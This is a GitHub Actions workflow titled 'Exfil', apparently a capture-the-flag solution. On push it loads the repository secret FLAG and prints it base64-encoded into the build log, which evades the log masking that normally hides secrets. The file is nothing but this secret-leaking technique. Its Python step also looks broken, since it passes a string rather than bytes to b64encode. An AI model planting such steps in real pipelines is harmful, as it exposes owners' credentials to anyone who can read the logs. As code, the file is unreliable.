name: Exfil

on:
  push:
    branches:
      - main

jobs:
  print:
    runs-on: ubuntu-latest

    steps:
      - name: Print Secret
        env:
          FLAG: ${{ secrets.FLAG }}
        run: |
          import os
          from base64 import b64encode
          print(b64encode(os.getenv("FLAG")))
        shell: python
